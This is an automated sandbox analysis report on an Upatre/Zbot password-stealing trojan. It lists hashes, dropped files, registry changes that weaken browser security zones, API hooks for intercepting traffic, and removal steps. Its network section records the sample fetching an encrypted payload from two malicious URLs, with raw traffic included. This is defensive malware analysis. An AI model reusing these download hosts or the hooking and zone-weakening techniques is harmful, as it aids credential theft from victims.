Trojan.GenericKD.1545947 (BitDefender), TrojanDownloader:Win32/Upatre.L (Microsoft), HEUR:Trojan.Win32.Generic (Kaspersky), Trojan.Win32.Upatre.jr (v) (VIPRE), Trojan.DownLoad3.28161 (DrWeb), Trojan.GenericKD.1545947 (B) (Emsisoft), Downloader-FSH (McAfee), Trojan.Zbot (Symantec), Trojan-Downloader.Win32.Upatre (Ikarus), Trojan.GenericKD.1545947 (FSecure), Downloader.Generic13.BVQK (AVG), Win32:Zbot-TCT [Trj] (Avast), TROJ_UPATRE.SM13 (TrendMicro), Trojan.GenericKD.1545947 (AdAware), Trojan-PSW.Win32.Zbot.4.FD, GenericInjector.YR (Lavasoft MAS)
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 410bfec23a57bcbf6655393e5e321f5e
SHA1: 8e2a4b3b8860f7ae760de66787ff907662bc1897
SHA256: 9b3da4514b38028b5ba710a7f91ecc8d392ee410317e98b83ffdcbc752944a98
SSDeep: 192:uc2gdAYC8jX2crQVrKUM231pnidL/jrEiXDexwDe8npMBoYht4fnYNSgVAT:uc2gSYC8xS31tKXEiXDeGDeCpttvYNQT
Size: 19144 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company:
Created at: 2014-02-02 13:56:21
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan-PSW. Trojan program intended for stealing users' passwords.
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan-PSW creates the following process(es):
ecyche.exe:1628
%original file name%.exe:1732
sewer.exe:1824
pdfupdate.exe:468
The Trojan-PSW injects its code into the following process(es):
Explorer.EXE:1684
File activity
The process ecyche.exe:1628 makes changes in the file system.
The Trojan-PSW creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\NTUSER.DAT.LOG (7448 bytes)
%Documents and Settings%\%current user%\NTUSER.DAT (6708 bytes)
The process %original file name%.exe:1732 makes changes in the file system.
The Trojan-PSW creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\pdfupdate.exe (19 bytes)
The process sewer.exe:1824 makes changes in the file system.
The Trojan-PSW creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Cookies\index.dat (964 bytes)
%Documents and Settings%\%current user%\Application Data\Idaz\ecyche.exe (2491 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@www.aol[1].txt (628 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\FIO84F8.bat (173 bytes)
The process pdfupdate.exe:468 makes changes in the file system.
The Trojan-PSW creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\al0302[1].enc (1610 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\sewer.exe (1667 bytes)
Registry activity
The process ecyche.exe:1628 makes changes in the system registry.
The Trojan-PSW creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Ukepukah]
"187haf5g" = "21 2A 79 C8 A7 D1 C3 B1 00 DE DD ED"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "98 71 11 81 BE E3 9E 42 29 37 A2 1E BE B0 1C 33"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan-PSW modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan-PSW modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan-PSW modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan-PSW deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process %original file name%.exe:1732 makes changes in the system registry.
The Trojan-PSW creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "67 33 7A 74 8E D4 C1 EB A8 3C 77 DD 6F 9B C9 F3"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"pdfupdate.exe" = "pdfupdate"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan-PSW modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan-PSW modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan-PSW modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The process sewer.exe:1824 makes changes in the system registry.
The Trojan-PSW creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C7 53 DD 5A 9D B6 24 E6 C2 C7 5E CA CE 30 40 60"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan-PSW modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan-PSW modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan-PSW modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan-PSW deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process pdfupdate.exe:468 makes changes in the system registry.
The Trojan-PSW creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"sewer.exe" = "sewer"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DC 82 D6 3D 7A 3E 0A E2 69 54 85 47 3E DE 51 58"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan-PSW modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan-PSW modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan-PSW modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan-PSW deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
Dropped PE files
MD5 | File path |
---|---|
f1f03b73b6c32ef28514d740073a4941 | c:\Documents and Settings\"%CurrentUserName%"\Application Data\Idaz\ecyche.exe |
0a2947abe4c9e6d539066993690c8a38 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\pdfupdate.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
The Trojan-PSW installs the following user-mode hooks in WININET.dll:
HttpSendRequestExA
HttpSendRequestW
InternetReadFileExA
InternetWriteFile
InternetWriteFileExA
InternetQueryDataAvailable
HttpQueryInfoW
HttpSendRequestExW
InternetReadFile
HttpQueryInfoA
HttpSendRequestA
InternetCloseHandle
The Trojan-PSW installs the following user-mode hooks in CRYPT32.dll:
PFXImportCertStore
The Trojan-PSW installs the following user-mode hooks in USER32.dll:
GetClipboardData
TranslateMessage
The Trojan-PSW installs the following user-mode hooks in Secur32.dll:
DecryptMessage
SealMessage
DeleteSecurityContext
The Trojan-PSW installs the following user-mode hooks in WS2_32.dll:
WSAGetOverlappedResult
WSASend
recv
gethostbyname
WSARecv
send
closesocket
freeaddrinfo
getaddrinfo
GetAddrInfoW
The Trojan-PSW installs the following user-mode hooks in ntdll.dll:
LdrLoadDll
NtCreateThread
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Scan a system with an anti-rootkit tool.
- Terminate malicious process(es) (How to End a Process With the Task Manager):
ecyche.exe:1628
%original file name%.exe:1732
sewer.exe:1824
pdfupdate.exe:468
- Delete the original Trojan-PSW file.
- Delete or disinfect the following files created/modified by the Trojan-PSW:
%Documents and Settings%\%current user%\NTUSER.DAT.LOG (7448 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pdfupdate.exe (19 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (964 bytes)
%Documents and Settings%\%current user%\Application Data\Idaz\ecyche.exe (2491 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@www.aol[1].txt (628 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\FIO84F8.bat (173 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\al0302[1].enc (1610 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\sewer.exe (1667 bytes)
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 5463 | 5632 | 4.20648 | 7bb11510f41b7f7df36cd0f5b7ee72b8 |
.rdata | 12288 | 698 | 1024 | 2.51041 | 59c84607aac08a088faf67bc9f288286 |
.data | 16384 | 322 | 512 | 1.47443 | 000c03a917f9a97e98181772b9217ac2 |
.rsrc | 20480 | 7928 | 8192 | 3.31217 | cbe724118cbc9edf74030c20c32d41c9 |
.reloc | 28672 | 194 | 512 | 1.2475 | e74eef7bfce1af487f797d9827763277 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://highclassdelhiescorts.in/images/css/al0302.enc | 103.8.127.189 |
hxxp://manjena.com/images/al0302.enc | 184.107.194.106 |
hxxp://v6v4.portal-standard.aol.akadns.net/ | |
hxxp://www.aol.com/ | 205.188.18.208 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /images/al0302.enc HTTP/1.1
Accept: text/*, application/*
User-Agent: Updates downloader
Host: manjena.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sat, 24 May 2014 06:00:28 GMT
Server: Apache/2.2.26 (Unix) mod_ssl/2.2.26 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.6
Last-Modified: Mon, 03 Feb 2014 15:36:31 GMT
ETag: "a548037-50648-4f18249ad9dc0"
Accept-Ranges: bytes
Content-Length: 329288
Connection: close
Content-Type: text/plain
ZZP..~.:.T.tS...W.......S..vS..OJ.)w_..w....Z...S...r... ...!...2..W0...<..w1...&...S..3....<D..}..}w.GwWF:..'T....X..3 Q..3...pl6.wT...U6.upP.x|.TM...p[6..S...0..HFo.w...;R..P[. %V.!wP..|R..w;.....C~...uCD..V..d...wS..1R...P..qQ^".2..x....FB.qP..w.m.w{..q..usr..o.H...G@.F...6...P.K.W.@.R2.ws..w3...2..'S.YY....S...Z..7}G.w.....t.u........}...0...i...R......d$..wl..HS..LS...S...'...Ad..[...X.J;w.. ..Kf...wC@..<N.v.@7..O6WP...TG.vi...D@..^N..R.....2)...D...u..(.S.>.2.E.'..6Q...&zKs..aqKN.....wQ......v..K....wSLL0.D....`wV#. ....=Ie~QLJ.... ...6....RG.vvD.JP.......S;?.-.....>D.G.s...vRE....=bS..WA......u]..w......L../..*:..[I....Lc*8A{_..j...._.....B....z./......1.Jv..J7V .....C.....f.eP%..^.H`...g[...P..0Q...R......v..@w@-.WpO...O-!.5.eU..........v'...\....O.)....W;..[O0.....V.Ht.(..^....y..UA..\E.u^@....7r..6r@.~....V...[...u9....8.....c..@g0...%..w@M..V,p..D. ..1....w;.ew@I....H..,..X#.v...!..........J....t..?.[.9?\Fa..E8...Ak..yrU..KS.....B.\......r....Z3..c...Q.B.PG8.!.A..;....!jW.{.PG(s!.........DuW$..wI.cSP....E.RT..S...S..wp.KqSL....I0R.K1Q.....B'..B.....XI.>S...W..,.. u..g.WT.ss..c....PL..........3...Sx.w...w....2.....H3. !w.$...$....-.S4!w..!w.$....9.S<D.S8!w.I.....t..9.r;@i[..wG.._3.J2[$.(..QfY}..\..vc..f..tu.....I.N...Sd..z.7d.#.Mb.....T.K..qsf. .`..FJTq.C..u.Ta.S..w....S..T.L.t../.@ .d.l..Z...../.Q.....Q.Q..ud./t. .|\dC!.;>.V..w...w.../c..GS..GS..w.U.3.n..E..wK..o#.kc#...S..wC..._..{#...S..w...wW..DAX.w...w....B.4o...'X|..S..NR~..m.E.2F.&....i^L.S.bv..).3..R..qwy..s.....G.~.,..
<<
<<< skipped >>>
GET / HTTP/1.1
User-Agent: Microsoft Internet Explorer
Host: VVV.aol.com
HTTP/1.1 200 OK
Date: Sat, 24 May 2014 05:56:44 GMT
Server: Apache-Coyote/1.1
Set-Cookie: RSP_CHECK_PORTAL_STARTPAGE.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=VVV.aol.com
Set-Cookie: RSP_CHECK_PORTAL_STARTPAGE.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/
Set-Cookie: RSP_CHECK_PORTAL_STARTPAGE.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=aol.com
Pragma: no-cache
Cache-Control: max-age=0, no-cache, no-store
R-Host: vm-149-174-20-50.asset.aol.com
ModPagespeedDisableFilters: rewrite_javascript,inline_css
Set-Cookie: JSESSIONID=B0613725DABD3470265BD70189ED6387; Path=/aol
Set-Cookie: tst=,60,s391a:,58,s392a:,58,s393a:,60,s394a:,59,s395a:,63,s396a:,63,s397a:,59,s398a:,61,s399a:,59,s400a:,61,s401a:,58,s402a:,58,s403a:,57,s404a:,5,r903a:b,3,r904a; Expires=Mon, 23-May-2016 05:56:44 GMT; Path=/
X-Mod-Pagespeed: 1.6.29.7-3343
Vary: Accept-Encoding
Transfer-Encoding: chunked
Content-Type: text/html;;charset=utf-8
102c..<!DOCTYPE html>.<html xmlns:og="hXXp://opengraphprotocol.org/schema/" xmlns:fb="hXXp://VVV.facebook.com/2008/fbml" xmlns="http://VVV.w3.org/1999/xhtml" xml:lang="en" lang="en" class="cobrand-responsive-test1 page- adellesans-enabled responsive notResponsiveTouch " id="global-header-light">.<head>.<!-- vm-149-174-20-50.asset.aol.com 1400911004692 -->.<script type="text/javascript" src="hXXp://portal.aolcdn.com/o.aolcdn.com/fonts/faw1kht.js.pagespeed.jm._Y1eHza8xn.js"></script>.<script type="text/javascript">try{Typekit.load();}catch(e){}</script>.<link rel="canonical" href="hXXp://VVV.aol.com/"/>.<meta http-equiv="pics-label" content='(pics-1.1 "hXXp://VVV.icra.org/ratingsv02.html" l r (ca 1 lz 1 nz 1 oz 1 vz 1) gen true for "hXXp://VVV.aol.com" r (ca 1 lz 1 nz 1 oz 1 vz 1) "hXXp://VVV.rsac.org/ratingsv01.html" l r (n 0 s 0 v 0 l 0) gen true for "hXXp://VVV.aol.com" r (n 0 s 0 v 0 l 0))'/>.<meta name="description" content="AOL offers today's news, sports, stock quotes, weather, movie reviews, TV trends and more. Get free email, AIM access, online radio, videos and horoscopes -- all on AOL.com!"/>.<meta property="og:description" content="AOL offers today's news, sports, stock quotes, weather, movie reviews, TV trends and more. Get free email, AIM access, online radio, videos and horoscopes -- all on AOL.com!"/>.<meta property="fb:app_id" content="183146218394780"/>.<meta property="og:site_name" content="AOL.com"/>.<me
<<
<<< skipped >>>
GET / HTTP/1.1
User-Agent: Microsoft Internet Explorer
Host: VVV.aol.com
Cookie: tst=,60,s391a:,58,s392a:,58,s393a:,60,s394a:,59,s395a:,63,s396a:,63,s397a:,59,s398a:,61,s399a:,59,s400a:,61,s401a:,58,s402a:,58,s403a:,57,s404a:,5,r903a:b,3,r904a
HTTP/1.1 200 OK
Date: Sat, 24 May 2014 05:56:45 GMT
Server: Apache-Coyote/1.1
Set-Cookie: RSP_CHECK_PORTAL_STARTPAGE.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=VVV.aol.com
Set-Cookie: RSP_CHECK_PORTAL_STARTPAGE.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/
Set-Cookie: RSP_CHECK_PORTAL_STARTPAGE.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=aol.com
Pragma: no-cache
Cache-Control: max-age=0, no-cache, no-store
R-Host: portal-fe5-ld117.websys.aol.com
ModPagespeedDisableFilters: rewrite_javascript,inline_css
Set-Cookie: JSESSIONID=A282EBB97850729911B6A0433E2253DA; Path=/aol
X-Mod-Pagespeed: 1.6.29.7-3343
Vary: Accept-Encoding
Content-Length: 123635
Content-Type: text/html;;charset=utf-8
<!DOCTYPE html>.<html xmlns:og="hXXp://opengraphprotocol.org/schema/" xmlns:fb="hXXp://VVV.facebook.com/2008/fbml" xmlns="hXXp://www.w3.org/1999/xhtml" xml:lang="en" lang="en" class="cobrand-responsive-test1 page- adellesans-enabled responsive notResponsiveTouch " id="global-header-light">.<head>.<!-- portal-fe5-ld117.websys.aol.com 1400911005705 -->.<link rel="stylesheet" type="text/css" href="hXXp://portal.aolcdn.com/p5/_v91.6.0/css/responsive.css"/><link rel="stylesheet" type="text/css" class="skin_link" href="http://portal.aolcdn.com/p5/skin/_v81/A.splash.css.pagespeed.cf.mV33vDpEAe.css"/><style>.IE #header_logo{filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='hXXp://portal.aolcdn.com/p5/_v91.6.0/css/logo_IE.png', sizingMethod='crop')}</style><style type="text/css" id="adhoccss-responsive-design">#weather .ttip{width:114px;white-space:nowrap}.dailyBuzz .photo-link{float:left}.dailyBuzz .videobutton,.dailyBuzz 